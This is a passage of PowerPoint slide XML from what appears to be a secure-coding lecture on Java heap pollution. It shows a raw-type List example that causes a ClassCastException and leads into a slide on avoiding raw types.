                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>obj</a:t>
            </a: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public static void main(String[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>args</a:t>
            </a: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List&lt;String&gt; list = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ArrayList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;String&gt; ();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addToList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(list, 42);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System.out.println</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>list.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(0));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="2209801"/>
            <a:ext cx="3962400" cy="380999"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -64707"/>
              <a:gd name="adj2" fmla="val -22955"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="292100" algn="l"/>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>ompile-time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>unchecked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>warning.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangular Callout 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="4953000"/>
            <a:ext cx="5791200" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14559"/>
              <a:gd name="adj2" fmla="val -82814"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>List </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>not guaranteed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>refer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>to a subtype of its declared </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>type (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>List&lt;String&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>), but only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>to subclasses or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>subinterfaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> of the declared </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>type (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>List</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>). </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="748994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Heap Pollution Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ListUtility</a:t>
            </a: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private static void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addToList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(List list, Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>obj</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>list.add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>obj</a:t>
            </a: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public static void main(String[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>args</a:t>
            </a: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List&lt;String&gt; list = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ArrayList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;String&gt; ();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addToList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(list, 42);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System.out.println</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>list.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(0));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangular Callout 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791200" y="4038600"/>
            <a:ext cx="2743200" cy="419501"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -72210"/>
              <a:gd name="adj2" fmla="val 26718"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="292100" algn="l"/>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ClassCastException</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914401" y="5105400"/>
            <a:ext cx="7848600" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 10835"/>
              <a:gd name="adj2" fmla="val -41679"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The JVM lets allows an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Integer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to be stored in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>List&lt;String&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and only throws an exception when the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Integer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is read.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>fail-fast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27525141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Mitigation: Avoid Raw </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ypes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
